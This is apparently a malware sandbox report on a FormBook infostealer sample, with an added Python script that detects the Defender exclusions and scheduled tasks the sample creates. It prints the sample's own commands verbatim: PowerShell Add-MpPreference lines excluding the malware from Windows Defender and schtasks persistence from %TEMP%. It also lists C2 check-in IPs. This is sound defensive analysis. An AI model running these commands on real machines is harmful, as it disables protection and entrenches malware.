Windows Analysis Report
MN1qo2qaJmEvXDP.exe

Overview

General Information

Sample name: MN1qo2qaJmEvXDP.exe
Analysis ID: 1571280
MD5: b5554d36a6fca18d2bba3d41d4070539
SHA1: 9ca275cf18f4796b97748ddb7e1525b997206293
SHA256: 2a9f7757a2446c5dcae00827c59c685ae20f44f182a169e9c74304b04aed9d60
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • MN1qo2qaJmEvXDP.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" MD5: B5554D36A6FCA18D2BBA3D41D4070539)
    • powershell.exe (PID: 1232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7204 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 5616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5640 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 1700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • aDvThgRLSEMTIq.exe (PID: 388 cmdline: "C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systray.exe (PID: 7648 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • aDvThgRLSEMTIq.exe (PID: 1344 cmdline: "C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7860 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • rlJvZXSinaRi.exe (PID: 7184 cmdline: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe MD5: B5554D36A6FCA18D2BBA3D41D4070539)
    • schtasks.exe (PID: 7548 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
No configs have been found
Yara matches on memory dumps:

Source | Rule | Description | Author
0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Yara matches on unpacked PE files:

Source | Rule | Description | Author
10.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
10.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started. Author: Florian Roth (Nextron Systems)
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (ProcessId 1232, ProcessName powershell.exe)
  Parent: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" (ParentProcessId 6340, ParentProcessName MN1qo2qaJmEvXDP.exe)
  CommandLine|base64offset|contains: ~2yzw
Source: Process started. Author: Florian Roth (Nextron Systems)
  Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
  Image: C:\Windows\SysWOW64\schtasks.exe (ProcessId 7548, ProcessName schtasks.exe)
  Parent: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe (ParentProcessId 7184, ParentProcessName rlJvZXSinaRi.exe)
  CommandLine|base64offset|contains: *j
Source: Process started. Author: Florian Roth (Nextron Systems)
  Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"
  Image: C:\Windows\SysWOW64\schtasks.exe (ProcessId 5640, ProcessName schtasks.exe)
  Parent: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" (ParentProcessId 6340, ParentProcessName MN1qo2qaJmEvXDP.exe)
  CommandLine|base64offset|contains: *j
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (ProcessId 1232, ProcessName powershell.exe)
  Parent: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" (ParentProcessId 6340, ParentProcessName MN1qo2qaJmEvXDP.exe)
  CommandLine|base64offset|contains: ~2yzw

                Persistence and Installation Behavior

Source: Process started. Author: Joe Security
  Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"
  Image: C:\Windows\SysWOW64\schtasks.exe (ProcessId 5640, ProcessName schtasks.exe)
  Parent: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe" (ParentProcessId 6340, ParentProcessName MN1qo2qaJmEvXDP.exe)
  CommandLine|base64offset|contains: *j
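The Sigma matches above describe two distinct steps: a Windows Defender exclusion added through PowerShell (Add-MpPreference -ExclusionPath) and a scheduled task registered from an XML file written to %TEMP%. The following is an added example of detection logic for both, written for this page and not taken from the sandbox report or from the Sigma rules themselves. The first four events are rebuilt from the report's process tree; the encoded PowerShell call and the benign task creation are constructed, and the Sysmon-style field names (image, command line, parent image) are an assumption.

```python
"""Detection logic for the two steps in the Sigma matches above: a Windows
Defender exclusion added with Add-MpPreference and a scheduled task created
from an XML file in %TEMP%.  Added example, not part of the Joe Sandbox report.
The first four events come from the report's process tree; the last two are
constructed.  The Sysmon-style field names are an assumption."""
import base64
import re
from collections import namedtuple

ProcessEvent = namedtuple("ProcessEvent", "pid image command_line parent_pid parent_image")
EXCLUSION_PARAMS = {"-exclusionpath", "-exclusionprocess", "-exclusionextension"}
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(desktop|downloads|appdata)\\", re.I)

def win_tokens(cmdline):
    """Split a Windows command line, honouring double quotes only."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def arg_after(toks, low, flag):
    """Value following a flag such as /XML, or None when absent or dangling."""
    i = low.index(flag) if flag in low else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else None

def expand_encoded(toks):
    """Append the tokens of any -EncodedCommand payload (UTF-16LE base64)."""
    out = list(toks)
    for i, t in enumerate(toks):
        if t.lower() in ("-encodedcommand", "-enc") and i + 1 < len(toks):
            try:
                out += win_tokens(base64.b64decode(toks[i + 1]).decode("utf-16le"))
            except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
                pass
    return out

def detect_defender_exclusion(ev):
    if basename(ev.image) != "powershell.exe":
        return None
    toks = expand_encoded(win_tokens(ev.command_line))
    low = [t.lower() for t in toks]
    if "add-mppreference" not in low:
        return None
    for i, t in enumerate(low):
        if t in EXCLUSION_PARAMS and i + 1 < len(toks):
            return {"rule": "defender_exclusion_added", "pid": ev.pid, "parameter": toks[i],
                    "value": toks[i + 1], "parent": ev.parent_image}
    return None

def detect_suspicious_schtasks(ev):
    if basename(ev.image) != "schtasks.exe":
        return None
    toks = win_tokens(ev.command_line)
    low = [t.lower() for t in toks]
    if "/create" not in low:
        return None
    xml, reasons = arg_after(toks, low, "/xml"), []
    if xml and TEMP_DIR.search(xml):
        reasons.append("task definition read from %TEMP%")
    if USER_WRITABLE.search(ev.parent_image):
        reasons.append("parent runs from a user-writable directory")
    if not reasons:
        return None
    return {"rule": "suspicious_schtasks_create", "pid": ev.pid, "xml": xml,
            "task": arg_after(toks, low, "/tn"), "parent": ev.parent_image, "reasons": reasons}

def scan(events):
    checks = (detect_defender_exclusion, detect_suspicious_schtasks)
    return [f for ev in events for f in (c(ev) for c in checks) if f]

def correlate(findings):
    r"""Tie exclusions to tasks whose name reuses the excluded file's stem, as
    rlJvZXSinaRi.exe and the task Updates\rlJvZXSinaRi do in this report."""
    by_stem, linked = {}, {}
    for f in findings:
        if f["rule"] == "defender_exclusion_added":
            by_stem.setdefault(basename(f["value"]).rsplit(".", 1)[0], []).append(f)
    for f in findings:
        if f["rule"] == "suspicious_schtasks_create" and f["task"]:
            stem = f["task"].rsplit("\\", 1)[-1].lower()
            if stem in by_stem:
                linked[stem] = {"exclusions": by_stem[stem], "task": f}
    return linked

PS_CMD = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS_IMG = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"  # WOW64 redirection, as in the report
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
SAMPLE = r"C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"
ENCODED = base64.b64encode(f'Add-MpPreference -ExclusionPath "{DROPPED}"'.encode("utf-16le")).decode()
EVENTS = [
    ProcessEvent(1232, PS_IMG, f'"{PS_CMD}" Add-MpPreference -ExclusionPath "{SAMPLE}"', 6340, SAMPLE),
    ProcessEvent(5616, PS_IMG, f'"{PS_CMD}" Add-MpPreference -ExclusionPath "{DROPPED}"', 6340, SAMPLE),
    ProcessEvent(5640, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"', 6340, SAMPLE),
    ProcessEvent(7548, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"', 7184, DROPPED),
    ProcessEvent(9001, PS_IMG, f'"{PS_CMD}" -EncodedCommand {ENCODED}', 6340, SAMPLE),  # constructed
    ProcessEvent(9002, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\task.xml"', 900, r"C:\Windows\System32\cmd.exe"),  # constructed, benign
]
```

Running scan(EVENTS) yields five findings: three exclusions (including the encoded form, which a plain string match on the command line would miss) and two task creations, each flagged both for reading its definition from %TEMP% and for being spawned from a user-writable path. correlate() then links the exclusion on rlJvZXSinaRi.exe to the task Updates\rlJvZXSinaRi, which is the pairing a responder wants surfaced first; the benign task from cmd.exe produces nothing.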
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T08:43:36.387491+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49729 | 162.0.215.33 | 80 | TCP
2024-12-09T08:43:39.011783+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49730 | 162.0.215.33 | 80 | TCP
2024-12-09T08:43:41.623741+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49731 | 162.0.215.33 | 80 | TCP
2024-12-09T08:43:51.260792+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49733 | 104.18.73.116 | 80 | TCP
2024-12-09T08:43:53.845627+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49734 | 104.18.73.116 | 80 | TCP
2024-12-09T08:43:56.559978+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49735 | 104.18.73.116 | 80 | TCP
2024-12-09T08:44:06.861014+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49738 | 192.185.147.100 | 80 | TCP
2024-12-09T08:44:09.488062+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49739 | 192.185.147.100 | 80 | TCP
2024-12-09T08:44:12.232412+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49740 | 192.185.147.100 | 80 | TCP
2024-12-09T08:44:21.321792+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49742 | 13.248.169.48 | 80 | TCP
2024-12-09T08:44:23.989425+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49743 | 13.248.169.48 | 80 | TCP
2024-12-09T08:44:26.663334+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49744 | 13.248.169.48 | 80 | TCP
2024-12-09T08:44:37.080387+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49747 | 3.33.130.190 | 80 | TCP
2024-12-09T08:44:39.683703+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49748 | 3.33.130.190 | 80 | TCP
2024-12-09T08:44:42.368068+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49749 | 3.33.130.190 | 80 | TCP
2024-12-09T08:44:52.069945+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49751 | 104.21.38.113 | 80 | TCP
2024-12-09T08:44:54.742227+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49752 | 104.21.38.113 | 80 | TCP
2024-12-09T08:44:57.415681+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49753 | 104.21.38.113 | 80 | TCP
2024-12-09T08:45:45.976450+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49755 | 103.249.106.91 | 80 | TCP
2024-12-09T08:45:48.712723+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49756 | 103.249.106.91 | 80 | TCP
2024-12-09T08:45:51.466321+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49757 | 103.249.106.91 | 80 | TCP
2024-12-09T08:46:01.778823+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49760 | 121.43.155.35 | 80 | TCP
2024-12-09T08:46:04.485609+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49761 | 121.43.155.35 | 80 | TCP
2024-12-09T08:46:07.139061+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49762 | 121.43.155.35 | 80 | TCP
2024-12-09T08:46:26.853604+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49764 | 199.192.23.123 | 80 | TCP
2024-12-09T08:46:29.526825+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49765 | 199.192.23.123 | 80 | TCP
2024-12-09T08:46:32.175938+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49766 | 199.192.23.123 | 80 | TCP
2024-12-09T08:46:42.249558+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49768 | 52.60.87.163 | 80 | TCP


                AV Detection

Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe. ReversingLabs: Detection: 63%
Source: MN1qo2qaJmEvXDP.exe. ReversingLabs: Detection: 63%
Source: MN1qo2qaJmEvXDP.exe. Virustotal: Detection: 47%
Source: Yara match. File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match. File source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted sample. Integrated Neural Analysis Model: matched with 99.9% probability
Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe. Joe Sandbox ML: detected
Source: MN1qo2qaJmEvXDP.exe. Joe Sandbox ML: detected
Source: MN1qo2qaJmEvXDP.exe. Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MN1qo2qaJmEvXDP.exe. Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: systray.pdb; source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: systray.pdbGCTL; source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780554280.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4781364571.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp. Caveat: this PDB path is found in the mapped image of aDvThgRLSEMTIq.exe itself, which identifies that binary as Joe Sandbox's own FakeChrome decoy (a browser stand-in provided by the sandbox) rather than a payload dropped by the sample; its name and hash (32B8AD6ECA9094891E792631BAEA9717) should therefore not be used as indicators for this sample.
Source: Binary string: RegSvcs.pdb,; source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP; source: RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb; source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\systray.exe. Code function: 19_2_00ACC730 FindFirstFileW, FindNextFileW, FindClose (19_2_00ACC730)
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe. Code function: 4x nop then jmp 09440109h (0_2_09440438)
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe. Code function: 4x nop then jmp 09440109h (0_2_094404A6)
Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe. Code function: 4x nop then jmp 057B0109h (11_2_057B04A6)
Source: C:\Windows\SysWOW64\systray.exe. Code function: 4x nop then xor eax, eax (19_2_00AB9F20)
Source: C:\Windows\SysWOW64\systray.exe. Code function: 4x nop then pop edi (19_2_00ABE2E8)
Source: C:\Windows\SysWOW64\systray.exe. Code function: 4x nop then mov ebx, 00000004h (19_2_048E04E8)

                Networking

Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49729 -> 162.0.215.33:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49730 -> 162.0.215.33:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49731 -> 162.0.215.33:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49733 -> 104.18.73.116:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49734 -> 104.18.73.116:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49735 -> 104.18.73.116:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49738 -> 192.185.147.100:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49739 -> 192.185.147.100:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49740 -> 192.185.147.100:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49742 -> 13.248.169.48:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49743 -> 13.248.169.48:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49744 -> 13.248.169.48:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49747 -> 3.33.130.190:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49748 -> 3.33.130.190:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49749 -> 3.33.130.190:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49751 -> 104.21.38.113:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49752 -> 104.21.38.113:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49753 -> 104.21.38.113:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49755 -> 103.249.106.91:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49756 -> 103.249.106.91:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49757 -> 103.249.106.91:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49760 -> 121.43.155.35:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49761 -> 121.43.155.35:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49762 -> 121.43.155.35:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49764 -> 199.192.23.123:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49765 -> 199.192.23.123:80
Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49766 -> 199.192.23.123:80
